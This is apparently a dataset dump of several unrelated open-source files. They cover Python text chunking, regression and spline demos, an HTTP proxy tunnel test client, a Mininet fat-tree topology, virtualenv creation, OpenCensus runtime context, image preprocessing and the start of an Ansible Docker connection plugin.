stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByWords(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of words,
    with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in words.
overlap: The number of words to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = splitKeepWhitespace(text)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingWords(wordQueue=chunkSoFar, numWords=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByLines(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of lines,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in lines.
overlap: The number of lines to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = text.splitlines(True)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token == '':
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingLines(lineQueue=chunkSoFar, numLines=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByNumber(text, numChunks):
"""
Cuts the text into equally sized chunks, where the size of the chunk is determined by the number of desired chunks.
Args:
text: The string with the contents of the file.
numChunks: The number of chunks to cut the text into.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
splitText = splitKeepWhitespace(text)
textLength = countWords(splitText)
chunkSizes = []
for i in xrange(numChunks):
chunkSizes.append(textLength / numChunks)
for i in xrange(textLength % numChunks):
chunkSizes[i] += 1
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
chunkIndex = 0
chunkSize = chunkSizes[chunkIndex]
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
chunkSoFar.queue.clear()
currChunkSize = 1
chunkSoFar.put(token)
chunkIndex += 1
chunkSize = chunkSizes[chunkIndex]
else:
chunkSoFar.put(token)
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
stringList = [''.join(subList) for subList in chunkList]
return stringList
def cutByMilestone(text, cuttingValue):
"""
Cuts the file into as many chunks as there are instances of the
substring cuttingValue. Chunk boundaries are made wherever
the string appears.
    Args: text -- the text to be chunked as a single string
          cuttingValue -- the substring on which chunk boundaries are made
Returns: A list of strings which are to become the new chunks.
"""
chunkList = [] #container for chunks
lenMS = len(cuttingValue) #length of milestone term
cuttingValue = cuttingValue.encode('utf-8')
if len(cuttingValue) > 0:
chunkstop = text.find(cuttingValue) #first boundary
print len(cuttingValue)
while chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
while chunkstop >= 0: #while next boundary != -1 (while next boundary exists)
print chunkstop
nextchunk = text[:chunkstop-1] #new chunk = current text up to boundary index
text = text[chunkstop+lenMS:] #text = text left after the boundary
chunkstop = text.find(cuttingValue) #first boundary
while chunkstop == 0:
if chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
chunkList.append(nextchunk) #append this chunk to chunk list
if len(text) > 0 :
chunkList.append(text)
else:
chunkList.append(text)
return chunkList
def cut(text, cuttingValue, cuttingType, overlap, lastProp):
"""
Cuts each text string into various segments according to the options chosen by the user.
Args:
text: A string with the text to be split
cuttingValue: The value by which to cut the texts by.
cuttingType: A string representing which cutting method to use.
overlap: A unicode string representing the number of words to be overlapped between each text segment.
lastProp: A unicode string representing the minimum proportion percentage the last chunk has to be to not get assimilated by the previous.
Returns:
A list of strings, each representing a chunk of the original.
"""
cuttingType = str(cuttingType)
if cuttingType != 'milestone' :
cuttingValue = int(cuttingValue)
overlap = int(overlap)
lastProp = float(lastProp.strip('%')) / 100
if cuttingType == 'letters':
stringList = cutByCharacters(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'words':
stringList = cutByWords(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'lines':
stringList = cutByLines(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'milestone':
stringList = cutByMilestone(text, cuttingValue)
else:
stringList = cutByNumber(text, cuttingValue)
return stringList
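# Illustrative usage sketch (values are made up for the example): cutting a
# short text into 5-word chunks with a 1-word overlap and a 50% minimum size
# for the final chunk.
#   cut(u"one two three four five six seven", u"5", 'words', u"1", u"50%")
#   # expected to yield ['one two three four five ', 'five six seven']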
|
mit
| 5,435,624,853,086,091,000
| 31.90389
| 146
| 0.648839
| false
| 4.185735
| false
| false
| false
|
drabastomek/practicalDataAnalysisCookbook
|
Codes/Chapter06/regression_randomForest.py
|
1
|
2303
|
# this is needed to load helper from the parent folder
import sys
sys.path.append('..')
# the rest of the imports
import helper as hlp
import pandas as pd
import numpy as np
import sklearn.ensemble as en
import sklearn.cross_validation as cv
@hlp.timeit
def regression_rf(x,y):
'''
Estimate a random forest regressor
'''
# create the regressor object
random_forest = en.RandomForestRegressor(
min_samples_split=80, random_state=666,
max_depth=5, n_estimators=10)
# estimate the model
random_forest.fit(x,y)
# return the object
return random_forest
# the file name of the dataset
r_filename = '../../Data/Chapter06/power_plant_dataset_pc.csv'
# read the data
csv_read = pd.read_csv(r_filename)
# select the names of columns
dependent = csv_read.columns[-1]
independent_reduced = [
col
for col
in csv_read.columns
if col.startswith('p')
]
independent = [
col
for col
in csv_read.columns
if col not in independent_reduced
and col not in dependent
]
# split into independent and dependent features
x = csv_read[independent]
y = csv_read[dependent]
# estimate the model using all variables (without PC)
regressor = regression_rf(x,y)
# print out the results
print('R: ', regressor.score(x,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor, x, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x.columns, regressor.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label))
# estimate the model using only the most important features
features = np.nonzero(regressor.feature_importances_ > 0.001)
x_red = csv_read[features[0]]
regressor_red = regression_rf(x_red,y)
# print out the results
print('R: ', regressor_red.score(x_red,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor_red, x_red, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x_red.columns, regressor_red.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label))
|
gpl-2.0
| 5,688,512,074,880,824,000
| 24.318681
| 62
| 0.671298
| false
| 3.194175
| false
| false
| false
|
airekans/Snippet
|
python/numpy_scipy_learning/spline.py
|
1
|
1310
|
import numpy as np
import scipy as sp
from scipy.interpolate import UnivariateSpline
import matplotlib.pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7]
y = [1, 4, 9, 16, 26, 30, 51]
# Test Spline
trajectory = np.array([x, y], dtype=float)
print trajectory
plt.plot(trajectory[0], trajectory[1])
plt.show()
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1])
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
print smoothTrajectory
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 2
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=1)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 3
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=2)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
|
unlicense
| -259,108,058,511,957,630
| 21.20339
| 70
| 0.726718
| false
| 2.723493
| false
| true
| false
|
kenshinx/rps
|
test/http_client.py
|
1
|
4579
|
#! /usr/bin/env python
import re
import socket
import optparse
HTTP_PROXY_HOST = "dev1"
HTTP_PROXY_PORT = 8889
HTTP_PROXY_HOST = "localhost"
HTTP_PROXY_PORT = 9891
HTTP_PROXY_UNAME = "rps"
HTTP_PROXY_PASSWD = "secret"
class HTTPTunnelPorxy(object):
pattern = re.compile("^HTTP\/1\.\d ([0-9]{3}) .*")
def __init__(self, proxy_host, proxy_port, proxy_uname, proxy_passwd):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.s.connect((proxy_host, proxy_port))
except:
print "can't connect porxy: %s:%d" %(proxy_host, proxy_port)
exit(1);
self.uname = proxy_uname;
self.passwd = proxy_passwd;
def handshake(self, host, port):
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "handshake success"
return True
elif code == "407":
return self.authenticate(host, port)
else:
print "invalid http response code"
return False
def authenticate(self, host, port):
credential = "%s:%s" %(self.uname, self.passwd)
credential = credential.encode("base64")
credential = "Basic %s" %credential
print credential
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "Proxy-Authorization: %s\r\n" %credential
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "http authenticate success"
return True
elif code == "407":
print "http authenticate fail"
return False
else:
print "invalid http response code"
return False
def doHTTPRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET / HTTP/1.1\r\n"
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doHTTPSRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET https://%s HTTP/1.1\r\n" %host
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doWhoisRequest(self, host, port, query):
if not self.handshake(host, port):
return
payload = "%s\r\n" %query
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: \n"
print data
def main():
proxy = HTTPTunnelPorxy(HTTP_PROXY_HOST, HTTP_PROXY_PORT,
HTTP_PROXY_UNAME, HTTP_PROXY_PASSWD)
proxy.doHTTPRequest("www.google.com", 80)
#proxy.doHTTPSRequest("www.google.com", 80)
#proxy.doWhoisRequest("whois.godaddy.com", 43, "kenshinx.me")
if __name__ == "__main__":
main()
|
mit
| -7,370,360,084,969,663,000
| 24.581006
| 74
| 0.505569
| false
| 3.831799
| false
| false
| false
|
calee0219/Course
|
SDN/Lab1/FatTreeTopoHardCode.py
|
1
|
4467
|
#!/usr/bin/env python
from mininet.topo import Topo
from mininet import net
from mininet.net import Mininet
POD_NUM = 4
class FatTreeTopoHardCode(Topo):
"""
A Simple FatTree Topo
"""
def __init__(self):
# Initialize topology
Topo.__init__(self)
# Create pod and core
## p0
p0h1 = self.addHost('p0h1')
p0h2 = self.addHost('p0h2')
p0h3 = self.addHost('p0h3')
p0h4 = self.addHost('p0h4')
## Edge Switch
p0e1 = self.addSwitch('p0e1')
p0e2 = self.addSwitch('p0e2')
## Aggregation
p0a1 = self.addSwitch('p0a1')
p0a2 = self.addSwitch('p0a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p0a1, p0e1, bw=100)
self.addLink(p0a1, p0e2, bw=100)
self.addLink(p0a2, p0e1, bw=100)
self.addLink(p0a2, p0e2, bw=100)
## Edge <-> Host
self.addLink(p0e1, p0h1, bw=100)
self.addLink(p0e1, p0h2, bw=100)
self.addLink(p0e2, p0h3, bw=100)
self.addLink(p0e2, p0h4, bw=100)
## p1
p1h1 = self.addHost('p1h1')
p1h2 = self.addHost('p1h2')
p1h3 = self.addHost('p1h3')
p1h4 = self.addHost('p1h4')
## Edge Switch
p1e1 = self.addSwitch('p1e1')
p1e2 = self.addSwitch('p1e2')
## Aggregation
p1a1 = self.addSwitch('p1a1')
p1a2 = self.addSwitch('p1a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p1a1, p1e1, bw=100)
self.addLink(p1a1, p1e2, bw=100)
self.addLink(p1a2, p1e1, bw=100)
self.addLink(p1a2, p1e2, bw=100)
## Edge <-> Host
self.addLink(p1e1, p1h1, bw=100)
self.addLink(p1e1, p1h2, bw=100)
self.addLink(p1e2, p1h3, bw=100)
self.addLink(p1e2, p1h4, bw=100)
## p2
p2h1 = self.addHost('p2h1')
p2h2 = self.addHost('p2h2')
p2h3 = self.addHost('p2h3')
p2h4 = self.addHost('p2h4')
## Edge Switch
p2e1 = self.addSwitch('p2e1')
p2e2 = self.addSwitch('p2e2')
## Aggregation
p2a1 = self.addSwitch('p2a1')
p2a2 = self.addSwitch('p2a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p2a1, p2e1, bw=100)
self.addLink(p2a1, p2e2, bw=100)
self.addLink(p2a2, p2e1, bw=100)
self.addLink(p2a2, p2e2, bw=100)
## Edge <-> Host
self.addLink(p2e1, p2h1, bw=100)
self.addLink(p2e1, p2h2, bw=100)
self.addLink(p2e2, p2h3, bw=100)
self.addLink(p2e2, p2h4, bw=100)
## p3
p3h1 = self.addHost('p3h1')
p3h2 = self.addHost('p3h2')
p3h3 = self.addHost('p3h3')
p3h4 = self.addHost('p3h4')
## Edge Switch
p3e1 = self.addSwitch('p3e1')
p3e2 = self.addSwitch('p3e2')
## Aggregation
p3a1 = self.addSwitch('p3a1')
p3a2 = self.addSwitch('p3a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p3a1, p3e1, bw=100)
self.addLink(p3a1, p3e2, bw=100)
self.addLink(p3a2, p3e1, bw=100)
self.addLink(p3a2, p3e2, bw=100)
## Edge <-> Host
self.addLink(p3e1, p3h1, bw=100)
self.addLink(p3e1, p3h2, bw=100)
self.addLink(p3e2, p3h3, bw=100)
self.addLink(p3e2, p3h4, bw=100)
# Add core switch
p0c = self.addSwitch('p0c')
p1c = self.addSwitch('p1c')
p2c = self.addSwitch('p2c')
p3c = self.addSwitch('p3c')
# Link Core to pod
## p0c
self.addLink(p0c, p0a1, bw=1000, loss=2)
self.addLink(p0c, p1a1, bw=1000, loss=2)
self.addLink(p0c, p2a1, bw=1000, loss=2)
self.addLink(p0c, p3a1, bw=1000, loss=2)
## p1c
self.addLink(p1c, p0a1, bw=1000, loss=2)
self.addLink(p1c, p1a1, bw=1000, loss=2)
self.addLink(p1c, p2a1, bw=1000, loss=2)
self.addLink(p1c, p3a1, bw=1000, loss=2)
## p2c
self.addLink(p2c, p0a2, bw=1000, loss=2)
self.addLink(p2c, p1a2, bw=1000, loss=2)
self.addLink(p2c, p2a2, bw=1000, loss=2)
self.addLink(p2c, p3a2, bw=1000, loss=2)
## p3c
self.addLink(p3c, p0a2, bw=1000, loss=2)
self.addLink(p3c, p1a2, bw=1000, loss=2)
self.addLink(p3c, p2a2, bw=1000, loss=2)
self.addLink(p3c, p3a2, bw=1000, loss=2)
topos = {'fattree': (lambda: FatTreeTopoHardCode())}
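# Illustrative usage note (not part of the original file): with Mininet
# installed, this custom topology can be launched from the command line, e.g.
#   sudo mn --custom FatTreeTopoHardCode.py --topo fattree --link tc
# The --link tc option is what makes the bw/loss parameters passed to addLink
# take effect; without it they are silently ignored.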
|
mit
| -4,874,537,547,002,850,000
| 30.457746
| 52
| 0.544437
| false
| 2.418517
| false
| false
| false
|
living180/vex
|
vex/make.py
|
1
|
2367
|
import os
import sys
import distutils.spawn
from vex.run import run
from vex import exceptions
PYDOC_SCRIPT = """#!/usr/bin/env python
from pydoc import cli
cli()
""".encode('ascii')
PYDOC_BATCH = """
@python -m pydoc %*
""".encode('ascii')
def handle_make(environ, options, make_path):
if os.path.exists(make_path):
# Can't ignore existing virtualenv happily because existing one
# might have different parameters and --make implies nonexistent
raise exceptions.VirtualenvAlreadyMade(
"virtualenv already exists: {0!r}".format(make_path)
)
ve_base = os.path.dirname(make_path)
if not os.path.exists(ve_base):
os.mkdir(ve_base)
elif not os.path.isdir(ve_base):
raise exceptions.VirtualenvNotMade(
"could not make virtualenv: "
"{0!r} already exists but is not a directory. "
"Choose a different virtualenvs path using ~/.vexrc "
"or $WORKON_HOME, or remove the existing file; "
"then rerun your vex --make command.".format(ve_base)
)
# TODO: virtualenv is usually not on PATH for Windows,
# but finding it is a terrible issue.
if os.name == 'nt' and not os.environ.get('VIRTUAL_ENV', ''):
ve = os.path.join(
os.path.dirname(sys.executable),
'Scripts',
'virtualenv'
)
else:
ve = 'virtualenv'
args = [ve, make_path]
if options.python:
if os.name == 'nt':
python = distutils.spawn.find_executable(options.python)
if python:
options.python = python
args += ['--python', options.python]
if options.site_packages:
args += ['--system-site-packages']
if options.always_copy:
args+= ['--always-copy']
returncode = run(args, env=environ, cwd=ve_base)
if returncode != 0:
raise exceptions.VirtualenvNotMade("error creating virtualenv")
if os.name != 'nt':
pydoc_path = os.path.join(make_path, 'bin', 'pydoc')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_SCRIPT)
perms = os.stat(pydoc_path).st_mode
os.chmod(pydoc_path, perms | 0o0111)
else:
pydoc_path = os.path.join(make_path, 'Scripts', 'pydoc.bat')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_BATCH)
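# Illustrative sketch (not part of the original module): handle_make is driven
# by vex's own option parser; a hypothetical direct call would look like
#   import os
#   handle_make(os.environ, options, os.path.expanduser('~/.virtualenvs/myenv'))
# where `options` exposes .python, .site_packages and .always_copy as used above.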
|
mit
| -1,349,267,931,707,901,400
| 32.814286
| 72
| 0.600338
| false
| 3.710031
| false
| false
| false
|
census-instrumentation/opencensus-python
|
context/opencensus-context/opencensus/common/runtime_context/__init__.py
|
1
|
5207
|
# Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import contextvars
except ImportError:
contextvars = None
import threading
__all__ = ['RuntimeContext']
class _RuntimeContext(object):
@classmethod
def clear(cls):
"""Clear all slots to their default value."""
raise NotImplementedError # pragma: NO COVER
@classmethod
def register_slot(cls, name, default=None):
"""Register a context slot with an optional default value.
:type name: str
:param name: The name of the context slot.
:type default: object
        :param default: The default value of the slot, can be a value or lambda.
:returns: The registered slot.
"""
raise NotImplementedError # pragma: NO COVER
def apply(self, snapshot):
"""Set the current context from a given snapshot dictionary"""
for name in snapshot:
setattr(self, name, snapshot[name])
def snapshot(self):
"""Return a dictionary of current slots by reference."""
return dict((n, self._slots[n].get()) for n in self._slots.keys())
def __repr__(self):
return ('{}({})'.format(type(self).__name__, self.snapshot()))
def __getattr__(self, name):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
return slot.get()
def __setattr__(self, name, value):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
slot.set(value)
def with_current_context(self, func):
"""Capture the current context and apply it to the provided func"""
caller_context = self.snapshot()
def call_with_current_context(*args, **kwargs):
try:
backup_context = self.snapshot()
self.apply(caller_context)
return func(*args, **kwargs)
finally:
self.apply(backup_context)
return call_with_current_context
class _ThreadLocalRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
_thread_local = threading.local()
def __init__(self, name, default):
self.name = name
self.default = default if callable(default) else (lambda: default)
def clear(self):
setattr(self._thread_local, self.name, self.default())
def get(self):
try:
return getattr(self._thread_local, self.name)
except AttributeError:
value = self.default()
self.set(value)
return value
def set(self, value):
setattr(self._thread_local, self.name, value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
class _AsyncRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
def __init__(self, name, default):
self.name = name
self.contextvar = contextvars.ContextVar(name)
self.default = default if callable(default) else (lambda: default)
def clear(self):
self.contextvar.set(self.default())
def get(self):
try:
return self.contextvar.get()
except LookupError:
value = self.default()
self.set(value)
return value
def set(self, value):
self.contextvar.set(value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
RuntimeContext = _ThreadLocalRuntimeContext()
if contextvars:
RuntimeContext = _AsyncRuntimeContext()
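# Illustrative sketch (not part of the original module): register a slot, set
# it, then propagate it into a callback. The slot name 'current_span' is a
# hypothetical example, not an OpenCensus API.
if __name__ == '__main__':
    RuntimeContext.register_slot('current_span', default=None)
    RuntimeContext.current_span = 'span-42'
    def _report():
        # Reads the value captured from the caller's context snapshot.
        print(RuntimeContext.current_span)
    RuntimeContext.with_current_context(_report)()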
|
apache-2.0
| 6,168,054,212,656,618,000
| 28.418079
| 78
| 0.580757
| false
| 4.484927
| false
| false
| false
|
google-research/tensor2robot
|
preprocessors/distortion.py
|
1
|
4670
|
# coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared utils for image distorton and cropping."""
from tensor2robot.preprocessors import image_transformations
import tensorflow.compat.v1 as tf
def maybe_distort_image_batch(images, mode):
"""Applies data augmentation to given images.
Args:
images: 4D Tensor (batch images) or 5D Tensor (batch of image sequences).
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
Returns:
Distorted images. Image distortion is identical for every image in the
batch.
"""
if mode == tf.estimator.ModeKeys.TRAIN:
images = image_transformations.ApplyPhotometricImageDistortions([images])[0]
return images
def preprocess_image(image,
mode,
is_sequence,
input_size,
target_size,
crop_size=None,
image_distortion_fn=maybe_distort_image_batch):
"""Shared preprocessing function for images.
Args:
image: A tf.Tensor for the input images, which is either a 4D Tensor (batch
of images) or 5D Tensor (batch of sequences). It is assumed that all
dimensions are constant, except the batch dimension.
    mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
is_sequence: Should be True if input is a batch of sequences, and False
otherwise.
input_size: [h, w] of the input image
target_size: [h, w] of the output image, expected to be equal or smaller
than input size. If smaller, we do a crop of the image.
crop_size: [h, w] of crop size. If None, defaults to target_size.
image_distortion_fn: A function that takes an image tensor and the training
mode as input and returns an image tensor of the same size as the input.
Returns:
A tf.Tensor for the batch of images / batch of sequences. If mode == TRAIN,
this applies image distortion and crops the image randomly. Otherwise, it
does not add image distortion and takes a crop from the center of the image.
"""
leading_shape = tf.shape(image)[:-3]
# Must be tf.float32 to distort.
image = tf.image.convert_image_dtype(image, tf.float32)
if is_sequence:
# Flatten batch dimension.
image = tf.reshape(image, [-1] + image.shape[-3:].as_list())
crop_size = crop_size or target_size
image = crop_image(
image, mode, input_size=input_size, target_size=crop_size)
# Reshape to target size.
image = tf.image.resize_images(image, target_size)
# Convert dtype and distort.
image = image_distortion_fn(image, mode=mode)
# Flatten back into a sequence.
if is_sequence:
tail_shape = tf.constant(list(target_size) + [3])
full_final_shape = tf.concat([leading_shape, tail_shape], axis=0)
image = tf.reshape(image, full_final_shape)
return image
def crop_image(img, mode, input_size=(512, 640), target_size=(472, 472)):
"""Takes a crop of the image, either randomly or from the center.
The crop is consistent across all images given in the batch.
Args:
img: 4D image Tensor [batch, height, width, channels].
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
input_size: (height, width) of input.
target_size: (height, width) of desired crop.
Returns:
img cropped to the desired size, randomly if mode == TRAIN and from the
center otherwise.
"""
if input_size == target_size:
# Don't even bother adding the ops.
return img
input_height, input_width = input_size
input_shape = (input_height, input_width, 3)
target_shape = target_size
if mode == tf.estimator.ModeKeys.TRAIN:
crops = image_transformations.RandomCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
else:
crops = image_transformations.CenterCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
return crops
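# Illustrative sketch (not part of the original module): preprocess a dummy
# batch of images in evaluation mode. The shapes below are assumptions chosen
# to match the default crop sizes used above.
if __name__ == '__main__':
  dummy = tf.zeros([2, 512, 640, 3], dtype=tf.uint8)
  out = preprocess_image(dummy,
                         mode=tf.estimator.ModeKeys.EVAL,
                         is_sequence=False,
                         input_size=(512, 640),
                         target_size=(472, 472))
  # out is a float32 tensor of shape [2, 472, 472, 3]; distortion and random
  # cropping are only applied in TRAIN mode.
  print(out.shape)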
|
apache-2.0
| 1,685,826,182,705,913,300
| 36.96748
| 80
| 0.66788
| false
| 3.988044
| false
| false
| false
|
huangminghuang/ansible-docker-connection
|
connection_plugins/docker.py
|
1
|
3787
|
# Connection plugin for configuring docker containers
# Author: Lorin Hochstein
#
# Based on the chroot connection plugin by Maykel Moya
import os
import subprocess
import time
from ansible import errors
from ansible.callbacks import vvv
class Connection(object):
def __init__(self, runner, host, port, *args, **kwargs):
self.host = host
self.runner = runner
self.has_pipelining = False
self.docker_cmd = "docker"
def connect(self, port=None):
""" Connect to the container. Nothing to do """
return self
def exec_command(self, cmd, tmp_path, sudo_user=None, sudoable=False,
executable='/bin/sh', in_data=None, become=None,
become_user=None):
""" Run a command on the local host """
# Don't currently support su
# if su or su_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via su")
if in_data:
raise errors.AnsibleError("Internal Error: this module does not "
"support optimized module pipelining")
# if sudoable and sudo_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via sudo")
if executable:
local_cmd = [self.docker_cmd, "exec", self.host, executable,
'-c', cmd]
else:
